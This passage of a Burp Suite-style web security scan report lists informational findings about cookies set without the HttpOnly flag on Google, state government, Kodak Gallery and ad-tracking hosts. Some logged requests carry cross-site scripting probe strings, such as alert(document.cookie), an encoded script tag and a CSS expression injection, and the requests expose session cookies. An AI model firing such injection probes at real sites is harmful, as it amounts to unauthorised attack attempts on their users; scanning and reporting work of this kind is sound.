Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=netmining=global_AOL[72]&betq=9772=414055[72]'; i.width=1; i.height=1; i.border=0; i.vsp
...[SNIP]...

14.405. http://khmdb0.google.com/kh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb0.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=7b7db42a19765bcc:TM=1304166107:LM=1304166107:S=l97zieUqiHpMrL03; expires=Mon, 29-Apr-2013 12:21:47 GMT; path=/; domain=.google.com
Date: Sat, 30 Apr 2011 12:21:47 GMT
Server: btfe
Content-Length: 11790
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

14.406. http://khmdb1.google.com/kh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khmdb1.google.com
Path:   /kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=fc2b0c1122371315:TM=1304166108:LM=1304166108:S=Q4xYT8hEf4PEfjAe; expires=Mon, 29-Apr-2013 12:21:48 GMT; path=/; domain=.google.com
Date: Sat, 30 Apr 2011 12:21:48 GMT
Server: btfe
Content-Length: 11790
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

14.407. http://ksgovernment.feedbacksurvey.sgizmo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ksgovernment.feedbacksurvey.sgizmo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ksgovernment.feedbacksurvey.sgizmo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:21:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Host
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: 1BKFGLG4DA8YZK2LYI9TGBZZJZVDSR=162170739; expires=Mon, 30-Apr-2012 12:21:49 GMT
location: http://pro23.sgizmo.com/survey.php?SURVEY=1BKFGLG4DA8YZK2LYI9TGBZZJZVDSR-250803-162170739&pswsgt=1282764221&sg_g=ee3e7ad09811fe4fe461e3a8543b2ce9&_csg=344fkSN0PCLJE&notice=DO-NOT-DISTRIBUTE-THIS-LINK
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.408. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5331d115efba8054:TM=1304166134:LM=1304166134:S=3lC6GeKYBlhC1NHB; expires=Mon, 29-Apr-2013 12:22:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

14.409. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.kodakgallery.com
Path:   /b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777?AQB=1&ndh=1&t=30%2F3%2F2011%2010%3A8%3A45%206%20300&ns=kodakimagingnetwork&pageName=landing%20page%3Avisit%20florida&g=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&r=http%3A%2F%2Fburp%2Fshow%2F43&cc=USD&ch=landing%20page&server=www.kodakgallery.com&c1=landing%20page%3Avisit%20florida&h1=landing%20page%3Avisit%20florida&c3=site%20section&c4=burp%20%5Bref%5D%20--%20landing%20page%3Avisit%20florida&c5=700019816903%7Cnull&c7=landing%20page%3Avisit%20florida&c8=landing%20page&v8=landing%20page&c9=visit%20florida&v9=visit%20florida&v11=700019816903%7Cnull&v26=700019816903&v27=D%3Dg&v28=D%3Dg&v33=burp%20%5Bref%5D&c34=burp%20%5Bref%5D&v34=D%3Dc34&v35=D%3Dc34&tnt=25173%3A0%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.kodakgallery.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0BA11A045581BD2C37F3ADAC84642E3F.ecom202_main; sourceId=700019816903; DYN_EMAIL=anon_mem1215451620@kodakgallery.com; bookStartTest1=control; bookUnlockedLayoutTest=lockedLayout; ft_80002=none; abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; mbox=check#true#1304176183|session#1304176122561-938029#1304177983|PC#1304176122561-938029.17#1305385725; s_cc=true; gpv_pn=landing%20page%3Avisit%20florida; wa_cpm=burp%20%5Bref%5D

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 15:08:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DE12F5051D0ADA-40000133C024CEB6[CE]; Expires=Thu, 28 Apr 2016 15:08:26 GMT; Domain=.kodakgallery.com; Path=/
Location: http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777?AQB=1&pccr=true&vidn=26DE12F5051D0ADA-40000133C024CEB6&&ndh=1&t=30%2F3%2F2011%2010%3A8%3A45%206%20300&ns=kodakimagingnetwork&pageName=landing%20page%3Avisit%20florida&g=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&r=http%3A%2F%2Fburp%2Fshow%2F43&cc=USD&ch=landing%20page&server=www.kodakgallery.com&c1=landing%20page%3Avisit%20florida&h1=landing%20page%3Avisit%20florida&c3=site%20section&c4=burp%20%5Bref%5D%20--%20landing%20page%3Avisit%20florida&c5=700019816903%7Cnull&c7=landing%20page%3Avisit%20florida&c8=landing%20page&v8=landing%20page&c9=visit%20florida&v9=visit%20florida&v11=700019816903%7Cnull&v26=700019816903&v27=D%3Dg&v28=D%3Dg&v33=burp%20%5Bref%5D&c34=burp%20%5Bref%5D&v34=D%3Dc34&v35=D%3Dc34&tnt=25173%3A0%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 15:08:26 GMT
Last-Modified: Sun, 01 May 2011 15:08:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www358
Content-Length: 0
Content-Type: text/plain


14.410. http://nc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nc.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nc.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NRVYIRS207.192.33.103CKOOW; path=/
Date: Fri, 29 Apr 2011 22:51:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=200991
Expires: Mon, 02 May 2011 06:41:10 GMT
Last-Modified: Fri, 29 Apr 2011 18:46:10 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 15541


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>NC.GOV -
           Home</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
       <meta nam
...[SNIP]...

14.411. http://newbrowse.livehelper.com/servlet/lhBrowse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/lhBrowse?ACTION=BTNREFRESH&RND=0.4528236691839993&p=Iowa.gov&c=1099892&b=company&g=Information%2520Services&op=&PAGEVISIT=true&r=1.442691869335249&a=Netscape&v=5&pl=Win32&dm=ia.gov&rf=http%3A//ia.gov/&tl=Iowa.gov%20LiveHelp&cs=true&pg=http%3A//ia.gov/livehelp.html&sd1=1156x1920&sd2=16&jsv=undefined&ps=&lot=1304161964473&ll=undefined&LC=1&pullFailed=0&nocache=0.2693614396266639&id=0&noCacheIE=1304161981692 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: searsTest=TEST

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:13:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: ASP.NET
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Set-Cookie: st1099892=135396596z2011-04-30 06:12:26z; expires=Sun, 29-Apr-2012 10:58:59 GMT; domain=.livehelper.com
Content-Length: 122

var str ={"opstatus":0,"windowsize":null,"validity":null, "ispulled":null};obj = eval(str);eval(pool[0].getCallback(obj));

14.412. http://nv.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nv.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=3c300247-d350-404b-a36b-f691b06aba62; expires=Mon, 30-Apr-2012 11:14:53 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:14:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=r1ekxxq4xnc3tjrus1ch3555; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:14:55 GMT
Content-Length: 35905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

14.413. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:11 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:39:11 GMT
RNT-Time: D=82489 t=1304111951723725
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...

14.414. http://pipes.yahoo.com/pipes/pipe.run  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pipes.yahoo.com
Path:   /pipes/pipe.run

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pipes/pipe.run HTTP/1.1
Host: pipes.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:24:42 GMT
Set-Cookie: B=3ek8guh6rnvsa&b=3&s=hk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private, max-age=3600
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Via: HTTP/1.1 r5.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Pipes: Rewire the Web</title><style type="text/css">
/* nn4 hide */
/*/*/
body {font:smal
...[SNIP]...

14.415. https://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: uid=1_1304111927_1304111927683:2889978505427215; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: kwd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: sit=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: cre=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: bpd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: apd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: scg=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: ppd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: afl=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:18:47 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- site #0 *not* found -->

14.416. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101452&mt_adid=100283&v1=&v2=&v3=&s1=&s2=&s3=&ord=1341911543 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851768

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x5.mediamath.com pid 0x337f 13183
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 30 Apr 2011 15:08:29 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304176109; domain=.mathtag.com; path=/; expires=Sun, 29-Apr-2012 15:08:29 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.417. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=133885704;fpan=0;fpa=P0-1132785758-1304175835376;ns=1;url=http%3A%2F%2Fwww.in.gov%2Fdwd%2FWorkOne%2F%2F%3F513f2;ref=http%3A%2F%2Fwww.workoneworks.com%2F%3F513f2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6c36e2d12eb%3D1;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304202080385;tzo=300;a=p-773__jh9iaI2Y HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EAQAD-8kjVmtjIMAAaUBAdEGgdIAmtGCqVKLPR_BobgwmkHrVrUwGjTBH-EQQBwSAAADBAG7ZL8Q8wwgNcdDECEbEgEiAaEosiUJYQCxLTNCMIIDBBjlEA6JIAECyESLKxA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/unpixel?id=961699&id=1050693&t=2
Set-Cookie: d=ENcAD-8kjVmtjIMAAZ8BAdEGgdIAmtGCqVKLPR_BobgwmkGpYgGjTBH-EQQBwSAAADBAG7ZLsgwgNcdDECEbEgEiAaEosiUJYQCxLTNCMIIDBBjlEA6JIAECyESLKxA; expires=Fri, 29-Jul-2011 22:20:59 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 30 Apr 2011 22:20:59 GMT
Server: QS


14.418. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=0.8367073847912252 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1185=2931142961646634775

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Mon, 30-May-2011 15:08:26 GMT; path=/; domain=.rubiconproject.com
